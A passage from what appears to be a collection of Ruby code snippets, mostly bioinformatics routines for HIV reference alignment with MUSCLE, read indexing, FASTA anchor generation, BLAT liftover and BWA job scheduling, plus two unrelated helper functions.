TGTTGAATACTCATACTCTTCCTTTTTCAATATTATTGAAGCATTTATCAGGGTTATTGTCTCATGAGCGGATACATATTTGAATGTATTTAGAAAAATAAACAAATAGGGGTTCCGCGCACATTTCCCCGAAAAGTGCCACCTGACGTCTAAGAAACCATTATTATCATGACATTAACCTATAAAAATAGGCGTATCACGAGGCCCTTTCGTCTCGCGCGTTTCGGTGATGACGGTGAAAACCTCTGACACATGCAGCTCCCGGAGACGGTCACAGCTTGTCTGTAAGCGGATGCCGGGAGCAGACAAGCCCGTCAGGGCGCGTCAGCGGGTGTTGGCGGGTGTCGGGGCTGGCTTAACTATGCGGCATCAGAGCAGATTGTACTGAGAGTGCACCATATGCGGTGTGAAATACCGCACAGATGCGTAAGGAGAAAATACCGCATCAGGCGCCATTCGCCATTCAGGCTGCGCAACTGTTGGGAAGGGCGATCGGTGCGGGCCTCTTCGCTATTACGCCAGGGGAGGCAGAGATTGCAGTAAGCTGAGATCGCAGCACTGCACTCCAGCCTGGGCGACAGAGTAAGACTCTGTCTCAAAAATAAAATAAATAAATCAATCAGATATTCCAATCTTTTCCTTTATTTATTTATTTATTTTCTATTTTGGAAACACAGTCCTTCCTTATTCCAGAATTACACATATATTCTATTTTTCTTTATATGCTCCAGTTTTTTTTAGACCTTCACCTGAAATGTGTGTATACAAAATCTAGGCCAGTCCAGCAGAGCCTAAAGGTAAAAAATAAAATAATAAAAAATAAATAAAATCTAGCTCACTCCTTCACATCAAAATGGAGATACAGCTGTTAGCATTAAATACCAAATAACCCATCTTGTCCTCAATAATTTTAAGCGCCTCTCTCCACCACATCTAACTCCTGTCAAAGGCATGTGCCCCTTCCGGGCGCTCTGCTGTGCTGCCAACCAACTGGCATGTGGACTCTGCAGGGTCCCTAACTGCCAAG
CCCCACAGTGTGCCCTGAGGCTGCCCCTTCCTTCTAGCGGCTGCCCCCACTCGGCTTTGCTTTCCCTAGTTTCAGTTACTTGCGTTCAGCCAAGGTCTGAAACTAGGTGCGCACAGAGCGGTAAGACTGCGAGAGAAAGAGACCAGCTTTACAGGGGGTTTATCACAGTGCACCCTGACAGTCGTCAGCCTCACAGGGGGTTTATCACATTGCACCCTGACAGTCGTCAGCCTCACAGGGGGTTTATCACAGTGCACCCTTACAATCATTCCATTTGATTCACAATTTTTTTAGTCTCTACTGTGCCTAACTTGTAAGTTAAATTTGATCAGAGGTGTGTTCCCAGAGGGGAAAACAGTATATACAGGGTTCAGTACTATCGCATTTCAGGCCTCCACCTGGGTCTTGGAATGTGTCCCCCGAGGGGTGATGACTACCTCAGTTGGATCTCCACAGGTCACAGTGACACAAGATAACCAAGACACCTCCCAAGGCTACCACAATGGGCCGCCCTCCACGTGCACATGGCCGGAGGAACTGCCATGTCGGAGGTGCAAGCACACCTGCGCATCAGAGTCCTTGGTGTGGAGGGAGGGACCAGCGCAGCTTCCAGCCATCCACCTGATGAACAGAACCTAGGGAAAGCCCCAGTTCTACTTACACCAGGAAAGGC\"\n hxb2_l = hxb2_ref.size\n head = \"\"\n 8.times {head << (65 + rand(25)).chr}\n temp_file = temp_dir + \"/temp\"\n temp_aln = temp_dir + \"/temp_aln\"\n\n l1 = 0\n l2 = 0\n name = \">test\"\n temp_in = File.open(temp_file,\"w\")\n temp_in.puts \">ref\"\n temp_in.puts hxb2_ref\n temp_in.puts name\n temp_in.puts seq\n temp_in.close\n\n print `muscle -in #{temp_file} -out #{temp_aln} -quiet`\n aln_seq = fasta_to_hash(temp_aln)\n aln_test = aln_seq[name]\n aln_test =~ /^(\\-*)(\\w.*\\w)(\\-*)$/\n gap_begin = $1.size\n gap_end = $3.size\n aln_test2 = $2\n ref = aln_seq[\">ref\"]\n ref = ref[gap_begin..(-gap_end-1)]\n ref_size = ref.size\n if ref_size > 1.3*(seq.size)\n l1 = l1 + gap_begin\n l2 = l2 + gap_end\n max_seq = aln_test2.scan(/[ACGT]+/).max_by(&:length)\n aln_test2 =~ /#{max_seq}/\n before_aln_seq = $`\n before_aln = $`.size\n post_aln_seq = $'\n post_aln = $'.size\n before_aln_seq_size = before_aln_seq.scan(/[ACGT]+/).join(\"\").size\n b1 = (1.3 * before_aln_seq_size).to_i\n post_aln_seq_size = post_aln_seq.scan(/[ACGT]+/).join(\"\").size\n b2 = (1.3 * post_aln_seq_size).to_i\n if (before_aln > seq.size) and (post_aln <= seq.size)\n ref = ref[(before_aln - b1)..(ref_size - post_aln - 1)]\n l1 = l1 + (before_aln - b1)\n elsif (post_aln > seq.size) and (before_aln <= seq.size)\n ref = ref[before_aln..(ref_size - post_aln - 1 + b2)]\n l2 = l2 + post_aln - b2\n elsif (post_aln > seq.size) and (before_aln > seq.size)\n ref = ref[(before_aln - b1)..(ref_size - post_aln - 1 + b2)]\n l1 = l1 + (before_aln - b1)\n l2 = l2 + (post_aln - b2)\n end\n temp_in = File.open(temp_file,\"w\")\n temp_in.puts \">ref\"\n temp_in.puts ref\n temp_in.puts name\n temp_in.puts seq\n temp_in.close\n print `muscle -in #{temp_file} -out #{temp_aln} -quiet`\n aln_seq = fasta_to_hash(temp_aln)\n aln_test = aln_seq[name]\n aln_test =~ /^(\\-*)(\\w.*\\w)(\\-*)$/\n gap_begin = $1.size\n gap_end = $3.size\n aln_test2 = $2\n ref = aln_seq[\">ref\"]\n ref = ref[gap_begin..(-gap_end-1)]\n ref_size = ref.size\n end\n aln_seq = fasta_to_hash(temp_aln)\n aln_test = aln_seq[name]\n aln_test =~ /^(\\-*)(\\w.*\\w)(\\-*)$/\n gap_begin = $1.size\n gap_end = $3.size\n aln_test = $2\n aln_test =~ /^(\\w+)(\\-*)\\w/\n s1 = $1.size\n g1 = $2.size\n aln_test =~ /\\w(\\-*)(\\w+)$/\n s2 = $2.size\n g2 = $1.size\n ref = aln_seq[\">ref\"]\n ref = ref[gap_begin..(-gap_end-1)]\n\n l1 = l1 + gap_begin\n l2 = l2 + gap_end\n repeat = 0\n\n if g1 == g2 and (s1 + g1 + s2) == ref.size\n if s1 > s2 and g2 > 2*s2\n ref = ref[0..(-g2-1)]\n repeat = 1\n l2 = l2 + g2\n elsif s1 < s2 and g1 > 2*s1\n ref = ref[g1..-1]\n repeat = 1\n l1 = l1 + g1\n end\n else\n if g1 > 2*s1\n ref = ref[g1..-1]\n repeat = 1\n l1 = l1 + g1\n end\n if g2 > 2*s2\n ref = ref[0..(-g2 - 1)]\n repeat = 1\n l2 = l2 + g2\n end\n end\n\n while repeat == 1\n temp_in = File.open(temp_file,\"w\")\n temp_in.puts 
\">ref\"\n    temp_in.puts ref\n    temp_in.puts name\n    temp_in.puts seq\n    temp_in.close\n    print `muscle -in #{temp_file} -out #{temp_aln} -quiet`\n    aln_seq = fasta_to_hash(temp_aln)\n    aln_test = aln_seq[name]\n    aln_test =~ /^(\\-*)(\\w.*\\w)(\\-*)$/\n    gap_begin = $1.size\n    gap_end = $3.size\n    aln_test = $2\n    aln_test =~ /^(\\w+)(\\-*)\\w/\n    s1 = $1.size\n    g1 = $2.size\n    aln_test =~ /\\w(\\-*)(\\w+)$/\n    s2 = $2.size\n    g2 = $1.size\n    ref = aln_seq[\">ref\"]\n    ref = ref[gap_begin..(-gap_end-1)]\n    l1 = l1 + gap_begin\n    l2 = l2 + gap_end\n    repeat = 0\n    if g1 > 2*s1\n      ref = ref[g1..-1]\n      repeat = 1\n      l1 = l1 + g1\n    end\n    if g2 > 2*s2\n      ref = ref[0..(-g2 - 1)]\n      repeat = 1\n      l2 = l2 + g2\n    end\n  end\n  ref = hxb2_ref[l1..(hxb2_l - l2 - 1)]\n\n  temp_in = File.open(temp_file,\"w\")\n  temp_in.puts \">ref\"\n  temp_in.puts ref\n  temp_in.puts name\n  temp_in.puts seq\n  temp_in.close\n  print `muscle -in #{temp_file} -out #{temp_aln} -quiet`\n  aln_seq = fasta_to_hash(temp_aln)\n  aln_test = aln_seq[name]\n  ref = aln_seq[\">ref\"]\n\n  #refine alignment\n\n  if ref =~ /^(\\-+)/\n    l1 = l1 - $1.size\n  elsif ref =~ /(\\-+)$/\n    l2 = l2 + $1.size\n  end\n  l1 = 0 if l1 < 0\n  if (hxb2_l - l2 - 1) >= l1\n    ref = hxb2_ref[l1..(hxb2_l - l2 - 1)]\n    temp_in = File.open(temp_file,\"w\")\n    temp_in.puts \">ref\"\n    temp_in.puts ref\n    temp_in.puts name\n    temp_in.puts seq\n    temp_in.close\n    print `muscle -in #{temp_file} -out #{temp_aln} -quiet`\n    aln_seq = fasta_to_hash(temp_aln)\n    aln_test = aln_seq[name]\n    ref = aln_seq[\">ref\"]\n\n    ref_size = ref.size\n    sim_count = 0\n    (0..(ref_size-1)).each do |n|\n      ref_base = ref[n]\n      test_base = aln_test[n]\n      sim_count += 1 if ref_base == test_base\n    end\n    similarity = (sim_count/ref_size.to_f*100).round(1)\n    print `rm -f #{temp_file}`\n    print `rm -f #{temp_aln}`\n    loc_p1 = l1 + 1\n    loc_p2 = hxb2_l - l2\n    if seq.size != (loc_p2 - loc_p1 + 1)\n      indel = true\n    elsif aln_test.include?(\"-\")\n      indel = true\n    else\n      indel = false\n    end\n    return [loc_p1,loc_p2,similarity,indel,aln_test,ref]\n  else\n    # failure: match the six-element shape returned by the rescue branch\n    return [0,0,0,0,\"N\",\"N\"]\n  end\nrescue\n  return [0,0,0,0,\"N\",\"N\"]\nend",
"def initialize(names, force_overwrite, ref, software,\n annotation, tophat_aligner, mismatches, err_rate)\n super(names, force_overwrite, ref, software)\n @annotation = annotation\n @tophat_aligner = tophat_aligner\n @mismatches = mismatches\n @err_rate = err_rate\n @mapped_bams = []\n @unmapped_bams = []\n @max_mismatches = 0\n end",
"def index(ref, ref_base, software, annotation = '')\n index_suffix = {\n bowtie1: '4.ebwt',\n bowtie2: '4.bt2',\n bwa: '.sa',\n star: '.star'\n }\n index_cmd = {\n bowtie1: \"bowtie-build -p #{ref} #{ref_base}\",\n bowtie2: \"bowtie2-build -p #{ref} #{ref_base}\",\n bwa: \"bwa index #{ref}\",\n star: \"mkdir #{ref_base} && \"\\\n 'STAR --runMode genomeGenerate' \\\n ' --runThreadN $(nproc)' \\\n \" --genomeDir #{ref_base}\"\\\n \" --genomeFastaFiles #{ref}\"\\\n ' --sjdbOverhang 49' \\\n \" --sjdbGTFfile #{annotation} \"\n }\n\n time = 5\n while File.exist?(\"#{ref_base}.lock\")\n print_e \"#{ref_base}.lock exists. Wait for #{time} seconds.\"\n sleep(time)\n time *= 5\n end\n\n return if software == :tophat ||\n skip_step?(\"#{ref_base}.#{index_suffix[software]}\", 'indexing')\n\n begin\n run_cmd(\"touch #{ref_base}.lock\")\n run_cmd(index_cmd[software])\n ensure\n run_cmd(\"rm -f #{ref_base}.lock\")\n end\n end",
"def fasta2anchors(input_file, anchor_length, sequencing_type, output_file)\n\t\tcounter = -1\n\t\tname, mate, seq = nil, nil, nil\n\t\t\n\t\tFile.open(output_file, 'w') do |output|\t\n\t\t\tFile.open(input_file, 'r').each do |line|\n\t\t\t\tcounter += 1\n\t\t\t\t\n\t\t\t\tif counter % 2 == 0\n\t\t\t\t\tif sequencing_type == 'se'\n\t\t\t\t\t\tname, mate = line.strip.match(/(?<=\\>)(\\S*)/).to_s, 1\n\t\t\t\t\telse\n\t\t\t\t\t\tname, mate = line.strip.match(/(?<=\\>)(\\S*)/).to_s.split('/')\n\t\t\t\t\tend\n\t\t\t\telsif counter % 2 == 1\n\t\t\t\t\tseq = line.strip\t\n\n\t\t\t\t\tname_A = \"#{name}_#{mate}_#{seq}_A\"\n\t\t\t\t\tname_B = \"#{name}_#{mate}_#{seq}_B\"\n\t\t\t\t\t\n\t\t\t\t\tseq_A = seq[0..anchor_length - 1]\n\t\t\t\t\tseq_B = seq[-anchor_length..-1]\n\n\t\t\t\t\toutput.puts [\">#{name_A}\", seq_A, \">#{name_B}\", seq_B].join(\"\\n\")\n\t\t\t\t\tname, mate, seq = nil, nil, nil\n\t\t\t\t\tcounter = -1\n\t\t\t\tend\n\t\t\tend\n\t\tend\n\tend",
"def fasta2anchors(input_file, anchor_length, sequencing_type, output_file)\n\t\tcounter = -1\n\t\tname, mate, seq = nil, nil, nil\n\t\t\n\t\tFile.open(output_file, 'w') do |output|\t\n\t\t\tFile.open(input_file, 'r').each do |line|\n\t\t\t\tcounter += 1\n\t\t\t\t\n\t\t\t\tif counter % 2 == 0\n\t\t\t\t\tif sequencing_type == 'se'\n\t\t\t\t\t\tname, mate = line.strip.match(/(?<=\\>)(\\S*)/).to_s, 1\n\t\t\t\t\telse\n\t\t\t\t\t\tname, mate = line.strip.match(/(?<=\\>)(\\S*)/).to_s.split('/')\n\t\t\t\t\tend\n\t\t\t\telsif counter % 2 == 1\n\t\t\t\t\tseq = line.strip\t\n\n\t\t\t\t\tname_A = \"#{name}_#{mate}_#{seq}_A\"\n\t\t\t\t\tname_B = \"#{name}_#{mate}_#{seq}_B\"\n\t\t\t\t\t\n\t\t\t\t\tseq_A = seq[0..anchor_length - 1]\n\t\t\t\t\tseq_B = seq[-anchor_length..-1]\n\n\t\t\t\t\toutput.puts [\">#{name_A}\", seq_A, \">#{name_B}\", seq_B].join(\"\\n\")\n\t\t\t\t\tname, mate, seq = nil, nil, nil\n\t\t\t\t\tcounter = -1\n\t\t\t\tend\n\t\t\tend\n\t\tend\n\tend",
"def run_align_assess\n filename = self.generate_fasta_alignment_file_for_all\n string = \"./lib/AlignAssess_wShorterID #{filename} P\"\n seq_array = Array.new\n if system(string)\n seq_id_array = self.sequences.map{|s| s.seq_id}\n new_filename = filename + \"_assess\"\n f = File.new(new_filename, \"r\")\n flag = false\n read_row= 999999999\n cur_row = 0\n while (line = f.gets)\n if cur_row > read_row && flag\n if line == \"\\n\"\n flag =false\n else\n seq_array << line.split(\"\\t\")\n end\n elsif line == \"Pair-wise %ID over shorter sequence:\\n\"\n flag=true\n read_row = cur_row + 2\n end\n cur_row +=1\n end\n range = seq_array.length - 1\n #seq_array.each do |row|\n for row_num in 0..range\n for i in 1..range#(row_num) \n PercentIdentity.first_or_create(:seq1_id=>seq_id_array[row_num],\n :seq2_id=>seq_id_array[i],\n :alignment_name => self.alignment_name,\n :percent_id=>seq_array[row_num][i])\n # print \"[#{row_num}:#{i-1}=>#{row[i]}],\"\n end\n #print \"\\n\"\n end\n end\n end",
"def muscle_sequence2(ref_seq = \"\", test_seq = \"\", temp_dir=File.dirname($0))\n temp_file = temp_dir + \"/temp\"\n temp_aln = temp_dir + \"/temp_aln\"\n name = \">test\"\n temp_in = File.open(temp_file,\"w\")\n temp_in.puts \">ref\"\n temp_in.puts ref_seq\n temp_in.puts name\n temp_in.puts test_seq\n temp_in.close\n print `muscle -in #{temp_file} -out #{temp_aln} -quiet`\n aln_seq = fasta_to_hash(temp_aln)[\">test\"]\n aln_ref = fasta_to_hash(temp_aln)[\">ref\"]\n File.unlink(temp_file)\n File.unlink(temp_aln)\n return [aln_ref, aln_seq]\nend",
"def build_cmd_ref\n # Example id's: N3K-C3048TP-1GE, N3K-C3064PQ-10GE, N7K-C7009, N7K-C7009\n\n debug \"Product: #{@product_id}\"\n debug \"Files being used: #{@files.join(', ')}\"\n\n @files.each do |file|\n feature = File.basename(file).split('.')[0]\n debug \"Processing file '#{file}' as feature '#{feature}'\"\n feature_hash = load_yaml(file)\n if feature_hash.empty?\n debug \"Feature #{feature} is empty\"\n next\n end\n feature_hash = filter_hash(feature_hash)\n if feature_hash.empty?\n debug \"Feature #{feature} is excluded\"\n @hash[feature] = UnsupportedCmdRef.new(feature, nil, file)\n next\n end\n\n base_hash = {}\n if feature_hash.key?('_template')\n base_hash = CommandReference.hash_merge(feature_hash['_template'])\n end\n\n feature_hash.each do |name, value|\n fail \"No entries under '#{name}' in '#{file}'\" if value.nil?\n @hash[feature] ||= {}\n if value.empty?\n @hash[feature][name] = UnsupportedCmdRef.new(feature, name, file)\n else\n values = CommandReference.hash_merge(value, base_hash.clone)\n @hash[feature][name] = CmdRef.new(feature, name, values, file)\n end\n end\n end\n end",
"def prepare_reads(base, map, fqgz0, *fqgzs0)\n\n fqgzs = [fqgz0] + fqgzs0\n\n bcs = Hash.new\n open(map, 'r').each do |line|\n bc, well = line.rstrip.split(',')\n bcs[bc] = well\n end\n \n bcl = bcs.keys.map!{|key| key.length}.sort.uniq[0]\n\n tso_pattern = '.'*options.umi_length + '.'*bcl + 'GG'\n\n #\n \n STDERR.puts \"#{`date`.strip}: Demultiplexing each raw sequence files...\"\n \n fqgz2csv0 = Hash.new\n fqgz2csv1 = Hash.new\n fqgz2base = Hash.new\n fqgzs.each do |fqgz|\n fqgz2csv0[fqgz] = get_temporary_path('strt.preprocess', 'csv', false)\n fqgz2csv1[fqgz] = get_temporary_path('strt.preprocess', 'csv', false)\n fqgz2base[fqgz] = get_temporary_path('strt.preprocess', 'base', false)\n end\n\n Parallel.map(fqgz2csv0.keys, in_processes: options.parallel) do |fqgz|\n cmds = [\n \"unpigz -c #{fqgz}\",\n \"#{fq1l_convert_command(options)}\",\n \"#{fq1l_count_command(options)} #{fqgz2csv0[fqgz]}\",\n \"fq1l match_5end#{grep_prefix_option(options)} #{tso_pattern}\",\n \"#{fq1l_count_command(options)} #{fqgz2csv1[fqgz]}\",\n \"fq1l annotate_index --first-cycle=#{options.umi_length+1} --last-cycle=#{options.umi_length+bcl}\",\n \"fq1l annotate_umi --first-cycle=1 --last-cycle=#{options.umi_length}\",\n \"fq1l sort_index#{coreutils_prefix_option}#{parallel_option(options)} --buffer-size=#{(options.maximum_memory/(fqgz2csv0.keys.size+1)).to_i}%\",\n \"fq1l demultiplex #{fqgz2base[fqgz]} #{map}\"\n ]\n cmds.insert(2, \"#{head_command(options)} -n #{options.reads}\") unless options.reads.nil?\n stats = Open3.pipeline(*cmds)\n stats.each_index do |i|\n raise \"Fail at process #{i}; #{stats[i]}; #{cmds[i]}\" unless stats[i].success? || (stats[i].signaled? && stats[i].termsig == 13)\n end\n end\n\n system \"fq1l sum_counts #{fqgz2csv0.values.join(' ')} > #{base}.count.step1.csv\"\n unlink_files(fqgz2csv0.values)\n \n system \"fq1l sum_counts #{fqgz2csv1.values.join(' ')} > #{base}.count.step2.csv\"\n unlink_files(fqgz2csv1.values)\n\n #\n \n (bcs.values + ['NA']).each do |well|\n\n STDERR.puts \"#{`date`.strip}: Finishing well #{well}...\"\n \n tmpfqgzs = fqgz2base.values.map {|base| \"#{base}.#{well}.fq.gz\"}\n csvs = Array.new(6) {|i| \"#{base}.#{well}.count.step#{i+3}.csv\"}\n \n pipeline(\"unpigz -c #{tmpfqgzs.join(' ')}\",\n \"#{fq1l_convert_command(options)}\",\n \"#{fq1l_count_command(options)} #{csvs[0]}\",\n \"#{fq1l_sort_command} --buffer-size=#{(options.maximum_memory/2).to_i}%\",\n \"fq1l exclude_duplicate\",\n \"#{fq1l_count_command(options)} #{csvs[1]}\",\n \"fq1l trim_3end_quality\",\n \"#{fq1l_count_command(options)} #{csvs[2]}\",\n \"fq1l trim_3end_primer#{coreutils_prefix_option}#{grep_prefix_option(options)}#{parallel_option(options)}\",\n \"#{fq1l_count_command(options)} #{csvs[3]}\",\n \"#{fq1l_sort_command} --buffer-size=#{(options.maximum_memory/2).to_i}%\",\n \"fq1l exclude_degenerate\",\n \"#{fq1l_count_command(options)} #{csvs[4]}\",\n \"fq1l trim_5end --minimum-length=#{options.minimum_length} #{tso_pattern}+\",\n \"#{fq1l_count_command(options)} #{csvs[5]}\",\n \"fq1l restore#{coreutils_prefix_option}\",\n \"pigz -c > #{base}.#{well}.fq.gz\")\n \n unlink_files(tmpfqgzs)\n \n end\n \n end",
"def getFt \n kword = ARGV[1]\n seq = @gb.to_biosequence\n seqoptions = \"\"\n\n for c in 2..ARGV.length-1\n seqoptions += \"#{ARGV[c]},\"\n end\n \n # look through all features\n @gb.each_cds do |ft|\n ftH = ft.to_hash\n loc = ft.locations\n gene = []\n product = []\n if (!ftH[\"gene\"].nil? && ftH[\"gene\"][0].downcase.include?(kword.downcase)) or\n (!ftH[\"product\"].nil? && ftH[\"product\"][0].downcase.include?(kword.downcase)) \n sbeg = loc[0].from.to_i\n send = loc[0].to.to_i\n fasta = Bio::Sequence::NA.new(seq.subseq(sbeg,send))\n position = \"#{sbeg}..#{send}\"\n if loc[0].strand == -1\n fasta.reverse_complement!\n position = \"c#{position}\"\n end\n pep = Bio::Sequence.new(fasta.translate)\n gene = ftH[\"gene\"][0] if !ftH[\"gene\"].nil?\n product = ftH[\"product\"][0] if !ftH[\"product\"].nil?\n if seqoptions.downcase.include?(\"pep\") or seqoptions.downcase.include?(\"prot\")\n puts pep.output_fasta(\"#{@accession}|#{position}|#{ftH[\"protein_id\"][0]}|#{gene}|#{product}|#{@org}\", 60)\n else\n dna = Bio::Sequence.auto(fasta)\n puts dna.output_fasta(\"#{@accession}|#{position}|#{ftH[\"protein_id\"][0]}|#{gene}|#{product}|#{@org}\",60)\n end\n end\n end\nend",
"def align_pairwise(bioseqs, opt={})\n factory = Bio::ClustalW.new\n clustal_opts = hash_opts_to_clustalopts(opt)\n factory.options = clustal_opts\n template = bioseqs.shift\n start_length = []\n pairwise_aligns = bioseqs.map do |bseq|\n clust_al = clustal_align([template, bseq], factory)\n cl_cons = clust_al.consensus\n aligned_string = clust_al[1].to_s\n #(st, len) = find_good_section(aligned_string, opt[:fidelity_length])\n seq_to_use = \n if opt[:consensus_fidelity]\n cl_cons\n else\n aligned_string\n end\n (st, len) = find_good_section(seq_to_use, opt[:fidelity_length])\n if st\n pristine = aligned_string[st, len].gsub('-','') # pristine read (ends removed)\n clustal_align([template.to_s, Bio::Sequence::NA.new(pristine)], factory)\n else\n warn \"a sequence does not meeting min fidelity! using original alignment\" \n clust_al\n end\n\n end\n end",
"def liftchain(outfile)\n #Future: Add option to recycle old chainfile #\n processes = CONFIG[:processes]\n blat_opts = CONFIG[:blat_opts]\n \n cp CONFIG[:source_fa], \"#{RUNDIR}/source.fa\"\n cp CONFIG[:target_fa], \"#{RUNDIR}/target.fa\"\n\n to_2bit \"#{RUNDIR}/source.fa\"\n to_2bit \"#{RUNDIR}/target.fa\"\n\n to_sizes \"#{RUNDIR}/source.2bit\"\n to_sizes \"#{RUNDIR}/target.2bit\"\n\n # Partition target assembly.\n sh \"faSplit sequence #{RUNDIR}/target.fa #{processes} #{RUNDIR}/chunk_\"\n\n parallel Dir[\"#{RUNDIR}/chunk_*.fa\"],\n 'faSplit -oneFile size %{this} 5000 %{this}.5k -lift=%{this}.lft &&' \\\n 'mv %{this}.5k.fa %{this}'\n\n # BLAT each chunk of the target assembly to the source assembly.\n parallel Dir[\"#{RUNDIR}/chunk_*.fa\"],\n \"blat -noHead #{blat_opts} #{RUNDIR}/source.fa %{this} %{this}.psl\"\n\n parallel Dir[\"#{RUNDIR}/chunk_*.fa\"],\n \"liftUp -type=.psl -pslQ -nohead\" \\\n \" %{this}.psl.lifted %{this}.lft warn %{this}.psl\"\n\n # Derive a chain file each from BLAT's .psl output files.\n parallel Dir[\"#{RUNDIR}/chunk_*.psl.lifted\"],\n 'axtChain -psl -linearGap=medium' \\\n \" %{this} #{RUNDIR}/source.2bit #{RUNDIR}/target.2bit %{this}.chn\"\n\n # Sort the chain files.\n parallel Dir[\"#{RUNDIR}/chunk_*.chn\"],\n 'chainSort %{this} %{this}.sorted'\n\n # Combine sorted chain files into a single sorted chain file.\n sh \"chainMergeSort #{RUNDIR}/*.chn.sorted | chainSplit #{RUNDIR} stdin -lump=1\"\n mv \"#{RUNDIR}/000.chain\", \"#{RUNDIR}/combined.chn.sorted\"\n\n # Derive net file from combined, sorted chain file.\n sh 'chainNet' \\\n \" #{RUNDIR}/combined.chn.sorted #{RUNDIR}/source.sizes #{RUNDIR}/target.sizes\" \\\n \" #{RUNDIR}/combined.chn.sorted.net /dev/null\"\n\n # Subset combined, sorted chain file.\n sh 'netChainSubset' \\\n \" #{RUNDIR}/combined.chn.sorted.net #{RUNDIR}/combined.chn.sorted\" \\\n \" #{RUNDIR}/liftover.chn\"\nend",
"def convert_alignment(args={})\n i, o = args[:in], args[:out]\n \n ff = Bio::FlatFile.auto(i).to_a\n aln = Bio::Alignment.new(ff)\n File.open(o, 'w') do |o|\n o.write aln.output :phylip\n end\n \nend",
"def get_correct_filename(annotation, files, submission)\n if annotation.position == -1\n # position -1 maps to the Autograder Output\n \"Autograder Output\"\n elsif files && !annotation.position.nil?\n # if the submission is an archive, use filename in archive;\n # otherwise, use submission filename\n Archive.get_nth_filename(files, annotation.position)\n else\n submission.filename\n end\n end",
"def process()\n # For lanes that don't need alignment, run post run and exit\n if @reference.eql?(\"sequence\")\n puts \"No alignment to perform since reference is \\\"sequence\\\"\"\n puts \"Running postrun script\"\n runPostRunCmd(\"\")\n exit 0\n end\n\n outputFile1 = @sequenceFiles[0] + \".sai\"\n\n alnCmd1 = buildAlignCommand(@sequenceFiles[0], outputFile1) \n obj1 = Scheduler.new(@fcAndLane + \"_aln_Read1\", alnCmd1)\n obj1.setMemory(@maxMemory)\n obj1.setNodeCores(@cpuCores)\n obj1.setPriority(@priority)\n obj1.runCommand()\n alnJobID1 = obj1.getJobName()\n\n # paired end flowcell\n if @isFragment == false\n outputFile2 = @sequenceFiles[1] + \".sai\"\n alnCmd2 = buildAlignCommand(@sequenceFiles[1], outputFile2)\n obj2 = Scheduler.new(@fcAndLane + \"_aln_Read2\", alnCmd2)\n obj2.setMemory(@maxMemory)\n obj2.setNodeCores(@cpuCores)\n obj2.setPriority(@priority)\n obj2.runCommand()\n alnJobID2 = obj2.getJobName()\n\n sampeCmd = buildSampeCommand(outputFile1, outputFile2, @sequenceFiles[0],\n @sequenceFiles[1])\n obj3 = Scheduler.new(@fcAndLane + \"_sampe\", sampeCmd)\n obj3.setMemory(@lessMemory)\n obj3.setNodeCores(@minCpuCores)\n obj3.setPriority(@priority)\n obj3.setDependency(alnJobID1)\n obj3.setDependency(alnJobID2)\n obj3.runCommand()\n makeSamJobName = obj3.getJobName()\n else\n # Flowcell is fragment\n samseCmd = buildSamseCommand(outputFile1, @sequenceFiles[0])\n obj3 = Scheduler.new(@fcAndLane + \"_samse\", samseCmd)\n obj3.setMemory(@lessMemory)\n obj3.setNodeCores(@minCpuCores)\n obj3.setPriority(@priority)\n obj3.setDependency(alnJobID1)\n obj3.runCommand()\n makeSamJobName = obj3.getJobName()\n end\n\n # Sort a BAM\n sortBamCmd = sortBamCommand()\n obj5 = Scheduler.new(@fcAndLane + \"_sortBam\", sortBamCmd)\n obj5.setMemory(@lessMemory)\n obj5.setNodeCores(@minCpuCores)\n obj5.setPriority(@priority)\n obj5.setDependency(makeSamJobName)\n obj5.runCommand()\n sortBamJobName = obj5.getJobName() \n\n # Mark duplicates on BAM\n markedDupCmd = markDupCommand()\n obj6 = Scheduler.new(@fcAndLane + \"_markDupBam\", markedDupCmd)\n obj6.setMemory(@lessMemory)\n obj6.setNodeCores(@minCpuCores)\n obj6.setPriority(@priority)\n obj6.setDependency(sortBamJobName)\n obj6.runCommand()\n markedDupJobName = obj6.getJobName()\n prevCmd = markedDupJobName\n\n # Filter out phix reads\n if @filterPhix == true\n phixFilterCmd = filterPhixReadsCmd(@markedBam)\n objX = Scheduler.new(@fcAndLane + \"_phixFilter\", phixFilterCmd)\n objX.setMemory(@lessMemory)\n objX.setNodeCores(@minCpuCores)\n objX.setPriority(@priority)\n objX.setDependency(prevCmd)\n objX.runCommand()\n phixFilterJobName = objX.getJobName()\n prevCmd = phixFilterJobName\n end\n\n # Fix mate information for paired end FC\n if @isFragment == false\n fixMateCmd = fixMateInfoCmd()\n objY = Scheduler.new(@fcAndLane + \"_fixMateInfo\" + @markedBam, fixMateCmd)\n objY.setMemory(@lessMemory)\n objY.setNodeCores(@minCpuCores)\n objY.setPriority(@priority)\n objY.setDependency(prevCmd)\n objY.runCommand()\n fixMateJobName = objY.getJobName()\n prevCmd = fixMateJobName\n end\n\n # Fix unmapped reads. When a read aligns over the boundary of two\n # chromosomes, BWA marks this read as unmapped but does not reset CIGAR to *\n # and mapping quality zero. 
This causes picard's validator to complain.\n # Hence, we fix that anomaly here.\n fixCIGARCmd = buildFixCIGARCmd(@markedBam)\n fixCIGARObj = Scheduler.new(@fcAndLane + \"_fixCIGAR\" + @markedBam, fixCIGARCmd)\n fixCIGARObj.setMemory(@lessMemory)\n fixCIGARObj.setNodeCores(@minCpuCores)\n fixCIGARObj.setPriority(@priority)\n fixCIGARObj.setDependency(prevCmd)\n fixCIGARObj.runCommand()\n fixCIGARJobName = fixCIGARObj.getJobName()\n prevCmd = fixCIGARJobName\n\n # Calculate Alignment Stats\n mappingStatsCmd = calculateMappingStats()\n obj7 = Scheduler.new(@fcAndLane + \"_AlignStats\", mappingStatsCmd)\n obj7.setMemory(@lessMemory)\n obj7.setNodeCores(@minCpuCores)\n obj7.setPriority(@priority)\n obj7.setDependency(prevCmd)\n obj7.runCommand()\n runStatsJobName = obj7.getJobName()\n prevCmd = runStatsJobName\n\n if @chipDesign != nil && !@chipDesign.empty?()\n captureStatsCmd = buildCaptureStatsCmd()\n capStatsObj = Scheduler.new(@fcAndLane + \"_CaptureStats\", captureStatsCmd)\n capStatsObj.setMemory(@lessMemory)\n capStatsObj.setNodeCores(@minCpuCores)\n capStatsObj.setPriority(@priority)\n capStatsObj.setDependency(prevCmd)\n capStatsObj.runCommand()\n capStatsJobName = capStatsObj.getJobName()\n prevCmd = capStatsJobName\n end\n\n # Hook to run code after final BAM is generated\n runPostRunCmd(prevCmd)\n end",
